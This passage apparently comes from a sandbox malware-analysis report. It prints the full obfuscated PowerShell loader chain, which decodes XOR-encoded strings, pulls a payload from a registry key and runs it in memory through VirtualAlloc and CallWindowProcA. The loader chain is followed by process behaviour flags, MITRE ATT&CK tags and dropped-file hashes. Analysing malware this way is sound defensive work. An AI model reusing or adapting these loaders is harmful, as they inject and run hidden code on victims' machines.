Si'Ro8Sy8GuEErAUdDAl9uaDCaCCiDNeCGuCCo9SuCLo8NoCGr9ChDGaFAd9Sw8Pr8RaCSi9Ca1Pu8SkCDuFDi7HeFUnFFaDTi5KoDBrFUnDCo8hiCRm9MaCfr1Pr8Sh2SnFTuEDiDSe9CaCHj2AlDAn8SlCSt5PuCTr1HoCSt9In8Up2UdEta5JeCAv2UnDTe8LyCSk9AuDExEAnCOp3beDUnCBnFPoFStCRe9ReDcoERnDHaAStCUn5CyCDuFCeCQu9trDRaFPa8Af2SeEFl1MiCUmDSuDDaESiDBiFBoCKa4MoCSpDRaCSt0MaFRo1Ri9Mu6Ra9Fa6PaEOvBDhCSt9PrDDi8EtENe8TeCRu9NoCPa0ElCre9OvCMrBAkCKmDAcDTs8GrCMo9PuEteAMiCHa3fuDflEAsETyAMaDAt9TuCSk2TrCLuFGaDBy8deCsp5IvCUu3TrCBr2HaFFoCSpCTy3chCUn5VoCRe2MiDFr8TnCTi9MeDEnEBo8No4St8mi4EgCFiALaCSp7AmDDiCTr8GlCSm8Ko8TeESp7PrCin3MiCBo2hiDstACoCVa9UdCSn2elDMi8VeCKl5MeCTa3UdCSk2PaCAc9InDEnEHoCty2PlCTe9FoDSkFRe8FrCLi8Sa8BeEDu8MoCFrDWoDbe8AfCGrDStCNo3TrDstCChDTrFByCOrDChCAf1PrCSt0SpCPu5MoCAp2BjCUdBBlDDiFCaDReFMaDTh5NoDAbFBeDSk8SeCUl9toCAn1EnCOk9boDAnETuCGi2DoCBi9AnDKoFKo9St8No8Au5So8Je0Po8FoCSu8Fo4ViERgBTrEPu8SsFSt8Yd8BlCFoELaCRe8Be4PlFRi7BaEBr5VaCNg2UnDSl8ToFArCheDHe8DiDTrEteFNo1Ov8Fr0Ba8FeCfoFAf7BlFVs9LuERe5SkCGr2MoDcu8ar9DyFMo9ReEomFIm1In8Cl0Tr8InCSeFDi7WhFFa9PaENo5UnCFr2UnDKa8In9AnFTr9KrEprFjo1No8An0Ed8UnCPrFHe7SvFUd9TiEDi5ReCbi2MuDla8Fr9BlFan9HaEGeFTe1Kr8Un5Om8CiCan8Hj4paFAf7siEIm5PrCGa2NoDMe8FoFLoCStDQu8IcDDiEPiFDi1Ne8Kv5Tr8To5Sa8In5Pr'Ca;Fa&re(de`$JaDInaOvtfiaOfoDapLusKoaSamBrlUdiUnnMegAlsSasUdySosPatAleUdmEkeBjrAanAbeBisFe7Cu)Re Ly`$RaOVicBrhHr2Sk0In6Is6Fo;su`$ShUPrdSumfoaRerdavSpnTpiOpnNogFueDinUbsHo Pa=Be TrfMgkKnpSt Sk`$GrDUaamutTaaSooChppasFuaDrmUflAnidynLigSksPesciyBrsimtBlefomFleSkrCunBeeTusNo5Sw Ta`$AaDdraLitsyaVaoRapPhsSaaTymsklCaiLanPrgSasLysPayCosHutArenemSueGlrSenUneTrsDi6Me;Fo`$PrOBecHyhEp2Be0Be6Ir7tr ho=Nu TaHSmTScBAd Fi'Ba8Fr8StEan8ErCEn5BeDBaFVaCRoFMaCTu0EfCGu3HvDsoFPuCPr9prDChFpu9BoFKe8MiCSy9fo1In8DiCGe8mo8TeETvAAmDRe9SoDMaCEsDHoCClCGi9FoCNo8EfCAp9FrDFoFch9Gy8Fa8Qu2BaEUn5StCCh2HaDNoARoCSt3AfCHv7NaCBa9Ov8Mo4deFGa7UnEOm5UnCAr2GrDHa8PoFNoCUnDSe8EmDauEdiFSp1No9sk6Sa9Ne6OmFRe6VkCPa9BeDEvEUnCso3Br8Ra0bl8DiCMe9ReAEr9CyASe9GoDTu8Qu0Co8DiCBe9BlCDiDEx4Ri9BiFRe9StCVa9OmCTj9SpCFe8re0Pe8VaCTa9FoCMiDCo4Ro9Sp8Go9MeCIn8Af5Kr'hu;Ov&Da(si`$UnDKoaTrtMaaInoYepFlsWiaMemSalSaiBrnAtgKesskskuyTesTrtMaeAfmBleKirPenNoeGrsEx7Ch)In Ud`$AtORucGehSk2Fi0Eb6Pe7Di;ad`$AaOPrcBrhPa2Re0Au6Ur8Ri Ov=Sn agHArTSkBVe As'Op8Co8liEUn9BiCSaAKaDJe8ObCPy9BaDAdEKaCJu1UmCKo2LaCOl8EqCUn9naCDi2SiCBo9Sk8hyCDi9Br1Ig8BlCAk8Ch8MiEOuAMiDRs9InDExCOrDRiCHoCMa9FoCst8BoCDo9KuDTrFMi9Sa8Ed8Sk2leEBl5KaCFr2PoDcuASaCPr3MaCSn7UbCBe9Re8Te4MiFPh7StEAd5RrCPo2PrDKu8SkFDeCDaDCa8BaDVoEAfFTi1Lu9Ra6Sp9Or6spFGe6FuCGo9InDKrEXeCga3Si8Ru0Cu8UiCAp9re5Pa9KaBBu9Ch4Th9ItBDa9coFmu9Ce5De9StESd9KoCra8tr0mo8BeCga9SpCEuDBo4Sp9BiFHe9BlCPr9PlCNo9ElCOv8Fo0Ha8BlCRu9KeCUdDSl4Pe9Ko8ko8Sp5Ek'Ph;Ty&Ar(Ma`$vaDMtaHatPraLeoSppResStaAimFjlUpiRanPygPlskhsFoysusSutDieApmHuePrrOunTeeAlsVi7Pr)Su Hr`$LvOFrcUdhHi2Ry0Af6Pr8Os;Ga`$ToGAfaBolFovSaaKrnDeoRhtGaeSukBrnOriStsBrkUneChsAn=An(MoGLoeDrtba-TeIMitToeEumRePDarTooBepBleKirFotCryde St-AcPFraFltSkhVi Bo'blHAuKLiCFoUFo:Kr\TiTLihHaiUnoCeaDilCacFeoLohAboSolFl\BeNCheAgdRekZarchaKodVasLo'Ne)Ti.StACslCadOpeErhDiystdreaBrsJeeFa;Fa`$BeOUncGahKi2Ac0Tr6Li9Sa Ce=Pr KiHFuTSkBSe Va'Sp8Br8BiEBe3krCSlFHeCAl4De9HuESu9ReCSh9NoAIs8WeCqu9By1Vo8LaCdiFCo7UnFSaFBaDPh5InDsaFAnDBe8DrCOm9PoCBr1Ce8Uf2baEEuFLoCOu3CoCDe2BrDNeAslCCh9OvDgrEUnDSi8OdFPr1Cr9Tr6Ko9El6DeEBrAseDPlETiCFo3caCHo1beEPeEflCMaDUdDBeFTaCSk9Ph9ElAPh9Ch8AnFBlFEnDEm8UnDBaEJaCRe5FeCAk2InCDrBLa8St4Ld8Du8ScEBrBHaCSeDJaCSe0LyDFlASaCMoDAwCPi2ReCLi3KvDOv8InCBr9ToCSt7ChCMa2SiCBe5HoDkoFPrCPr7UnCTr9ReDSkFKi8St5Br'fl;Bl&Ui(Ji`$CyDAaaUntKoaWaoUnpIssOvaGemDelMuiTrnNegFrsPusAeyNesSttDeeKomSpeUnrPanBeeRisPr7Su)Le ir`$OpOHucEihFo2ab0St6Wo9Li;Ca`$BiGMaaFulUnvPhaAtnWaoSktTrePrkThnBiiEfsSikSueGlsPh0Sr Ha=Br CaHKfTSeBRe Tu'LoFHe7BeFPaFSmDSu5EkDLiFgaDRe8OrCLj9SnCSu1Pr8Ka2noFLeEbyDSi9PaCpj2LyDFi8SrCAm5RaCLi1BeCEx9So8Im2YdEVe5BeCUn2KiDFl8PrCTe9RaDSkEVeCLo3ClDVaCKbFHjFSiCMa9PaDStEGeDFrATeCPe5ArCOvFsmCSu9UnDpaFSj8Ti2BrEBi1BuCKrDRiDOpESpDouFteCAr4brCpaDReCDy0DuFte1Sp9hy6Gs9Sp6CoEAnFKlCRe3BaDKlCBeDPs5Ra8Fu4Tr8Zi8AdEbe3CaCStFLrCEx4La9LiESt9FiCTi9biASl8Xe0Ud8PiCPa9SuCSt8Ca0Su8StCsh8ThCDu8Me8UnETr8GeCen5DeDBeFBrCinFUdCSp0LeCTe3KlDUdFmoCKo9CrDPiFNe9grFFa8Kv0An8TeCar9phASl9IdAis9HeDCe8un5La'Ch;Un&As(Po`$SaDRaatrtTuaJuoFopKasBraOumNolKaiFrnRegmysDosExyPrsSktBaeJemLyeYerFrnTvePosAr7Ci)Id Br`$syGStaRelMavFeaKlnTaoRetHaeBikFinPhiBlsMokOpeStsSo0Va;Ov`$SwCJoaPutKiiUnoAcnbuiBecPhaGelEjlOsyHe=Un`$HaOHocHlhBe2br0Pu6Su.nacmioUtuSinRetPr-gr6fo6Fo1po;Ga`$ReGLiaSulPavToaRenGeoSetKeeHekNonSiikosBakSteJosOv1Dr Tr=Pr PeHDoTReBBr St'TrFNe7EeFAnFCuDKl5BlDKlFSaDpe8PlCFo9boCSc1Li8Hi2KaFUnEGgDSa9KrCEn2CrDGl8ZoCFr5SaCGr1DrCRe9tu8Pa2UpEBu5MoCAc2StDln8OrCBa9GeDDiETrCCh3BuDPoCPeFDaFKvCPh9SoDFoEHeDDeAKoCke5BiCMeFBaCri9ChDSaFLa8sk2HuEOp1enCArDGrDTaEMeDStFAmCPa4NoCUnDReCve0ToFLn1Pe9Fi6Tr9co6ZoEMiFViCOv3SuDHyCPiDBi5Is8st4Pl8fu8DeESh3vaCFlFEgCSt4Ba9StEBr9RiCBr9UnAMe8va0Aa8LgCBi9BeAKo9StARe9HoDSu8As0Po8HeCfi8Co8OvEEk9UnCLyAMaDSe8ToCHo9HaDSoEFrCVi1NoCRa2flCSu8AfCYp9SkCsi2BeCYd9Si8Sk0St8SuCHy8Ti8SiECoFFlCSeDCoDPa8ZaCCi5SeCEt3SyCSc2SeCSy5MeCMaFTrChvDClCCo0BeCYo0FiDFo5St8Pr5In'Le;Fa&Sw(Qu`$GrDUdaGatNyaChoInpChsLaaDymOllLoiBanomgInsImsHeyeksUvtMieBamFaeFirDenUneDesSa7tr)Fl Ou`$EkGStaEglAfvPoaCynPeoXitPeeSykOvnLiiSpsRukLeePrsNo1Op;Al`$KvGBoaSklkivTiaStnDaoUntMaechkKunVaiBesSkkleeBasAa2va Ch=At TuHNoTHoBGr gr'th8Co8kaCCaAJeDSo9PaDUaEAfCKe9Ar8ThCMi9Sk1st8PlCRaFPe7ReFRiFCoDLo5neDMoFAsDVi8MaCJi9TsCZi1No8Sa2TeFArERoDMo9KoCAr2SpDCa8UnCLd5SkCMg1TiCTy9Mo8No2EcEsk5DrCPr2orDWi8GaCSk9MaDImEAnCHe3UnDNoCTrFErFHeCRa9TeDheEThDIdASlCPr5BaCThFOmCIm9DoDUnFHe8Al2KrEUn1GrCAnDDaDunESkDViFChCfi4BaCHaDFaCRe0ReFEm1Ov9Al6Ha9Fo6ArEBrBkrCfo9FeDFr8GoEUs8RoCfa9ArCRa0HeCRa9smCPoBSpCStDinDSq8VoCSh9FaESyAFuCre3ShDEpEUnEAfAToDSm9FoCSt2phCKaFNoDFr8BeCUn5spCEl3CuCCh2DdFGoCscCEx3AeCUl5IlCAc2StDKo8SeCBr9DiDFlEme8Ra4Go8br4UbCOcAHyCSi7CoDFoCSk8RiCHo8Cl8DeFTrFAlCTiDroCex2MiCEt8MiCPrDSuCVe0No8ZoCCh8Nd8OvEBiADeCId5ReDBuFvuCSk7FoCTv9IdDSuFInDSy8juCbn2TrCBoBBeCkn9biDOuEVeCCh2suCTi9Fe8Pi5No8Ud0Bl8SkCsy8Ro4GoECeBSvETy8HuFSi8St8VuCTiEBlCFl8yv4haFMe7ChEbi5WiCHu2SaDSl8foFkiCstDVe8VrDPrEZiFTi1Vr8De0Ph8caCMeFMa7UnEKl5ZiCRn2InDEx8NoFStCEtDRu8VeDlaEUdFRi1bi8de0La8CoCKaFHu7LaEBu5LoCTa2SrDRe8FaFAmCUnDHe8KrDTjEFoFSv1Se8fo0Vi8geCPoFBo7EkEra5StCho2upDCr8fuFLeCLeDSt8BlDPrEInFSe1Ta8Un0Na8StCWiFRi7OvEre5peCCo2OpDGa8InFScCObDAd8BoDLiEOvFgr1Bi8Pl5Gu8afCLe8Sc4PeFPh7BlESa5AaCHu2BiDUn8ReFLrCSpDAd8SuDmaEUnFAn1Ti8Hy5Me8po5Su8Va5Ch'Ou;Ka&Pe(Ac`$PeDFuaRetLiaKaoBopInsCeaBemtolAdiTanBagInsFosBayPlsMatUneRemBreBlrAtnAceSisPe7Te)Ur Or`$VaGFeaSulByvGuaUnnPhoHatNiebokGonMaiVesUnkFreunsHo2Ud;Om`$UdGLaaSalbnvEaangnAnoeftSoeAckNanHaiNesChkOpeFlsSk3No Uh=st seHGrTSnBTy ra'Cl8Re8HuCSaAIsDSe9BeDadEJeCMe9Ku8Tu2WrEsk5MaCPe2FrDMaAstCRn3StCNo7BaCRe9St8Do4Po8Fr8SuESa8SiCVa5LeDPrFDaCGlFMuCDe0BiCbu3OfDCiFPaCha9FeDBaFKl9NoFCo8Pu0Ud8Sy8TeELo9TeCCyANoDRa8SaCCo9SwDCrEseCSn1BaCUn2DeCDe8TrCCo9FaCBi2HaCTo9Su8Te0Mi8Or8SmFOb9AtCHo8IkCVi1TiCKlDFuDStEFoDMbABiCSt2SkCBe5FlCSc2TrCHyBTvCEp9GlCAr2HaDMoFHa8Sp0Sa9BrCFr8Ka0Sp9BrCNo8Re5Po'Pu;Br&Va(Su`$DeDInaPatViaHooVepArsBraNemAnlDiiConUngFasUdsToyPyshytVeeWamMaeGrrManreeStsMy7Sp)ti He`$TrGudaGelTjvAmaTrnPooSutejeEdkEsnHyiPesSekFieShsSa3Vr#Ap;""";Function Galvanotekniskes9 { param([String]$Plastic); For($Semiblasphemous=2; $Semiblasphemous -lt $Plastic.Length-1; $Semiblasphemous+=(2+1)){ $Anflyvendes = $Anflyvendes + $Overanstreng4 + $Plastic.Substring($Semiblasphemous, 1); } $Anflyvendes;}$leveringstidernes0 = Galvanotekniskes9 'RaIomEPrXdr ';$leveringstidernes1= Galvanotekniskes9 $perceptionism;if([IntPtr]::size -eq 8){START-job { param($Luane) powershell $Luane } -RunAs32 -Argument $leveringstidernes1 | wait-job | Receive-Job;}else{&$leveringstidernes0 $leveringstidernes1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2304
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Plastic); $Sacks = New-Object byte[] ($Plastic.Length / 2); For($Semiblasphemous=0; $Semiblasphemous -lt $Plastic.Length; $Semiblasphemous+=2){ $Sacks[$Semiblasphemous/2] = [convert]::ToByte($Plastic.Substring($Semiblasphemous, 2), 16); $Sacks[$Semiblasphemous/2] = ($Sacks[$Semiblasphemous/2] -bxor 172); } [String][System.Text.Encoding]::ASCII.GetString($Sacks);}$Skulende0=HTB 'FFD5DFD8C9C182C8C0C0';$Skulende1=HTB 'E1C5CFDEC3DFC3CAD882FBC5C29F9E82F9C2DFCDCAC9E2CDD8C5DAC9E1C9D8C4C3C8DF';$Skulende2=HTB 'EBC9D8FCDEC3CFEDC8C8DEC9DFDF';$Skulende3=HTB 'FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E4CDC2C8C0C9FEC9CA';$Skulende4=HTB 'DFD8DEC5C2CB';$Skulende5=HTB 'EBC9D8E1C3C8D9C0C9E4CDC2C8C0C9';$Skulende6=HTB 'FEF8FFDCC9CFC5CDC0E2CDC1C9808CE4C5C8C9EED5FFC5CB808CFCD9CEC0C5CF';$Skulende7=HTB 'FED9C2D8C5C1C9808CE1CDC2CDCBC9C8';$Skulende8=HTB 'FEC9CAC0C9CFD8C9C8E8C9C0C9CBCDD8C9';$Skulende9=HTB 'E5C2E1C9C1C3DED5E1C3C8D9C0C9';$Dataopsamlingssystemernes0=HTB 'E1D5E8C9C0C9CBCDD8C9F8D5DCC9';$Dataopsamlingssystemernes1=HTB 'EFC0CDDFDF808CFCD9CEC0C5CF808CFFC9CDC0C9C8808CEDC2DFC5EFC0CDDFDF808CEDD9D8C3EFC0CDDFDF';$Dataopsamlingssystemernes2=HTB 'E5C2DAC3C7C9';$Dataopsamlingssystemernes3=HTB 'FCD9CEC0C5CF808CE4C5C8C9EED5FFC5CB808CE2C9DBFFC0C3D8808CFAC5DED8D9CDC0';$Dataopsamlingssystemernes4=HTB 'FAC5DED8D9CDC0EDC0C0C3CF';$Dataopsamlingssystemernes5=HTB 'C2D8C8C0C0';$Dataopsamlingssystemernes6=HTB 'E2D8FCDEC3D8C9CFD8FAC5DED8D9CDC0E1C9C1C3DED5';$Dataopsamlingssystemernes7=HTB 'E5E9F4';$Dataopsamlingssystemernes8=HTB 'F0';$Sandal=HTB 'F9FFE9FE9F9E';$Fiskestngerne=HTB 'EFCDC0C0FBC5C2C8C3DBFCDEC3CFED';function fkp {Param ($Bevilgende, $Horrorise) ;$Och2060 =HTB '88F9C2C8C9DEDFD8D8D8C9C0DFC9DFCAC3C2C8C9DF8C918C84F7EDDCDCE8C3C1CDC5C2F19696EFD9DEDEC9C2D8E8C3C1CDC5C282EBC9D8EDDFDFC9C1CEC0C5C9DF84858CD08CFBC4C9DEC981E3CEC6C9CFD88CD78C88F382EBC0C3CECDC0EDDFDFC9C1CEC0D5EFCDCFC4C98C81EDC2C88C88F382E0C3CFCDD8C5C3C282FFDCC0C5D88488E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9485F7819DF182E9DDD9CDC0DF8488FFC7D9C0C9C2C8C99C858CD18582EBC9D8F8D5DCC98488FFC7D9C0C9C2C8C99D85';&($Dataopsamlingssystemernes7) $Och2060;$Och2065 = HTB '88EBCDD9DFDFCAC5C0D8C9DECAD9C2C7D8C5C3C2C9C28C918C88F9C2C8C9DEDFD8D8D8C9C0DFC9DFCAC3C2C8C9DF82EBC9D8E1C9D8C4C3C88488FFC7D9C0C9C2C8C99E808CF7F8D5DCC9F7F1F18CEC8488FFC7D9C0C9C2C8C99F808C88FFC7D9C0C9C2C8C9988585';&($Dataopsamlingssystemernes7) $Och2065;$Och2061 = HTB 'DEC9D8D9DEC28C88EBCDD9DFDFCAC5C0D8C9DECAD9C2C7D8C5C3C2C9C282E5C2DAC3C7C98488C2D9C0C0808CEC84F7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E4CDC2C8C0C9FEC9CAF184E2C9DB81E3CEC6C9CFD88CFFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E4CDC2C8C0C9FEC9CA8484E2C9DB81E3CEC6C9CFD88CE5C2D8FCD8DE85808C8488F9C2C8C9DEDFD8D8D8C9C0DFC9DFCAC3C2C8C9DF82EBC9D8E1C9D8C4C3C88488FFC7D9C0C9C2C8C999858582E5C2DAC3C7C98488C2D9C0C0808CEC8488EEC9DAC5C0CBC9C2C8C985858585808C88E4C3DEDEC3DEC5DFC98585';&($Dataopsamlingssystemernes7) $Och2061;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Bobble,[Parameter(Position = 1)] [Type] $Politianmeldelsernes = [Void]);$Och2062 = HTB '88FFC7C3DCD9C8DFC9DEC9DF8C918CF7EDDCDCE8C3C1CDC5C2F19696EFD9DEDEC9C2D8E8C3C1CDC5C282E8C9CAC5C2C9E8D5C2CDC1C5CFEDDFDFC9C1CEC0D58484E2C9DB81E3CEC6C9CFD88CFFD5DFD8C9C182FEC9CAC0C9CFD8C5C3C282EDDFDFC9C1CEC0D5E2CDC1C98488FFC7D9C0C9C2C8C9948585808CF7FFD5DFD8C9C182FEC9CAC0C9CFD8C5C3C282E9C1C5D882EDDFDFC9C1CEC0D5EED9C5C0C8C9DEEDCFCFC9DFDFF19696FED9C28582E8C9CAC5C2C9E8D5C2CDC1C5CFE1C3C8D9C0C98488FFC7D9C0C9C2C8C995808C88CACDC0DFC98582E8C9CAC5C2C9F8D5DCC98488E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9C808C88E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9D808CF7FFD5DFD8C9C182E1D9C0D8C5CFCDDFD8E8C9C0C9CBCDD8C9F185';&($Dataopsamlingssystemernes7) $Och2062;$Och2063 = HTB '88FFC7C3DCD9C8DFC9DEC9DF82E8C9CAC5C2C9EFC3C2DFD8DED9CFD8C3DE8488FFC7D9C0C9C2C8C99A808CF7FFD5DFD8C9C182FEC9CAC0C9CFD8C5C3C282EFCDC0C0C5C2CBEFC3C2DAC9C2D8C5C3C2DFF19696FFD8CDC2C8CDDEC8808C88EEC3CECEC0C98582FFC9D8E5C1DCC0C9C1C9C2D8CDD8C5C3C2EAC0CDCBDF8488FFC7D9C0C9C2C8C99B85';&($Dataopsamlingssystemernes7) $Och2063;$Och2064 = HTB '88FFC7C3DCD9C8DFC9DEC9DF82E8C9CAC5C2C9E1C9D8C4C3C88488E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9E808C88E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9F808C88FCC3C0C5D8C5CDC2C1C9C0C8C9C0DFC9DEC2C9DF808C88EEC3CECEC0C98582FFC9D8E5C1DCC0C9C1C9C2D8CDD8C5C3C2EAC0CDCBDF8488FFC7D9C0C9C2C8C99B85';&($Dataopsamlingssystemernes7) $Och2064;$Och2065 = HTB 'DEC9D8D9DEC28C88FFC7C3DCD9C8DFC9DEC9DF82EFDEC9CDD8C9F8D5DCC98485';&($Dataopsamlingssystemernes7) $Och2065 ;}$Konventionernes = HTB 'C7C9DEC2C9C09F9E';$Och2066 = HTB '88EAD9DCDCC9C8C9DF988C918CF7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EBC9D8E8C9C0C9CBCDD8C9EAC3DEEAD9C2CFD8C5C3C2FCC3C5C2D8C9DE8484CAC7DC8C88E7C3C2DAC9C2D8C5C3C2C9DEC2C9DF8C88E8CDD8CDC3DCDFCDC1C0C5C2CBDFDFD5DFD8C9C1C9DEC2C9DF9885808C84EBE8F88CEC84F7E5C2D8FCD8DEF1808CF7F9E5C2D89F9EF1808CF7F9E5C2D89F9EF1808CF7F9E5C2D89F9EF1858C84F7E5C2D8FCD8DEF1858585';&($Dataopsamlingssystemernes7) $Och2066;$Udmarvningens = fkp $Dataopsamlingssystemernes5 $Dataopsamlingssystemernes6;$Och2067 = HTB '88E8C5DFCFC0C3DFC9DF9F8C918C88EAD9DCDCC9C8C9DF9882E5C2DAC3C7C984F7E5C2D8FCD8DEF19696F6C9DEC3808C9A9A9D808C9CD49F9C9C9C808C9CD4989C85';&($Dataopsamlingssystemernes7) $Och2067;$Och2068 = HTB '88E9CAD8C9DEC1C2C8C9C2C98C918C88EAD9DCDCC9C8C9DF9882E5C2DAC3C7C984F7E5C2D8FCD8DEF19696F6C9DEC3808C959B949B9F959E9C808C9CD49F9C9C9C808C9CD49885';&($Dataopsamlingssystemernes7) $Och2068;$Galvanotekniskes=(Get-ItemProperty -Path 'HKCU:\Thioalcohol\Nedkrads').Aldehydase;$Och2069 = HTB '88E3CFC49E9C9A8C918CF7FFD5DFD8C9C182EFC3C2DAC9DED8F19696EADEC3C1EECDDFC99A98FFD8DEC5C2CB8488EBCDC0DACDC2C3D8C9C7C2C5DFC7C9DF85';&($Dataopsamlingssystemernes7) $Och2069;$Galvanotekniskes0 = HTB 'F7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EFC3DCD58488E3CFC49E9C9A808C9C808C8C88E8C5DFCFC0C3DFC9DF9F808C9A9A9D85';&($Dataopsamlingssystemernes7) $Galvanotekniskes0;$Cationically=$Och206.count-661;$Galvanotekniskes1 = HTB 'F7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EFC3DCD58488E3CFC49E9C9A808C9A9A9D808C88E9CAD8C9DEC1C2C8C9C2C9808C88EFCDD8C5C3C2C5CFCDC0C0D585';&($Dataopsamlingssystemernes7) $Galvanotekniskes1;$Galvanotekniskes2 = HTB '88CAD9DEC98C918CF7FFD5DFD8C9C182FED9C2D8C5C1C982E5C2D8C9DEC3DCFFC9DEDAC5CFC9DF82E1CDDEDFC4CDC0F19696EBC9D8E8C9C0C9CBCDD8C9EAC3DEEAD9C2CFD8C5C3C2FCC3C5C2D8C9DE8484CAC7DC8C88FFCDC2C8CDC08C88EAC5DFC7C9DFD8C2CBC9DEC2C985808C84EBE8F88CEC84F7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1808CF7E5C2D8FCD8DEF1858C84F7E5C2D8FCD8DEF1858585';&($Dataopsamlingssystemernes7) $Galvanotekniskes2;$Galvanotekniskes3 = HTB '88CAD9DEC982E5C2DAC3C7C98488E8C5DFCFC0C3DFC9DF9F8088E9CAD8C9DEC1C2C8C9C2C98088F9C8C1CDDEDAC2C5C2CBC9C2DF809C809C85';&($Dataopsamlingssystemernes7) $Galvanotekniskes3#"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6c73df1bb0c83bf158c1aebc058fbdd2

SHA1
c3f64dbe2337cf4be331efaed86e600076d613cf

SHA256
2bfd8c972f6bb05ae1adca5237a7210d569fb1f9662ad4dd6bfc4e00e88d17ba

SHA512
a9093e7a6808cbe9aa86eb9eb1d50513e942800da5ffc9685c670a34d2349019caa65705dcd6e959de4b066673e3c45b64b5a94b7589c057817ec61eb65188e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
548e21a8f5e2c98bf35e935495e36c05

SHA1
39fa41b02e71c3e931c1840ab86606f9529d8398

SHA256
5c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d

SHA512
f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
2bcfce2b951487e14859649268b145cb

SHA1
7a219881fd0c1c28e08c4d1905f32845b49073a9

SHA256
2b0ffee4b25877a4e08f989ae9a6f6fea590345549cc73ed9a8f82608b285e6b

SHA512
87052dfc32a178fb0b3c29b57d9c58a5f04a9edf6e41ec991dc25d7e94c170763a4f8cf4c08efb83bec6f86e8ebd1ddc1e7c718cc462a1e54af663a3f0195f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
29a79f95fb2502924a850d263e5852b7

SHA1
3b395e9b0be540792284d58edbcb8c03e464bed9

SHA256
d11ba5e3294570ac864fe542c0c13f09be32b587d365382e3172f04491544246

SHA512
8399b9ca24345e19f1e971716c884c2781b5b896c1ee25fa0064067ea05edc633b6281915a9e79d0cfaf1e4143ad4b4495deecaa6e4a8fcdeb057ebf31dd2895

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
a1106447f8fd488820bb459a7c77654f

SHA1
ebd1139ec8175e7b6f8f00df8ac27fea4c0f3d44

SHA256
8895e9f4da9017586761e3b066e386ff3e7acce9e75c9c71f90fcd097c42e58a

SHA512
f7ed2bf8cc8e3c7b3d9ea12d0220d6ca9f9958610b934de878cb2da7470b81b8dde818a2b6e811701af00e411115cb84e82bfbe6095b376001fbb353eb180c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
8d972fba81431f985a5b5c7d9764e193

SHA1
495ea6ea3f3f18df86aefc431226cd74b566ac54

SHA256
29ba4ebdc30fd70d9dc6abfb20a576d696989fe5dee0be04c64df746ea119f50

SHA512
ad8d881d5aae0b194c8a19602afdbc3eb8e9064f1274456558827d1ae3eff447fc75a8350c59c70157b0ec631f0e8dc3678eeae3e9e2aa14e9477f037219d864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
b37f26cf29e38a852a0e80874c42214d

SHA1
32f9eeb3ba4b9c8be7ce57b428abdbae2657dffc

SHA256
fc35477b19158e0c4b43131a8d7cd54762f4d9b8d294310b2233f90b4839316c

SHA512
c2de9c21ad4e94aab4579620a0ec9b7b6fd996e63efd3c970d135193057532c5b4f3e2b50893c272985901c7c4327b131468e6b582b52fc3ce8d04c85babbcec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6e0c8c483124491eb57e5a9ade30701f

SHA1
7001e77caaa62024815b44ad9c758c72c60424fb

SHA256
e1ab3316d323dd818e7ddf8842ff92ea12ff38b0ba648713fa3a1d053d91c4ce

SHA512
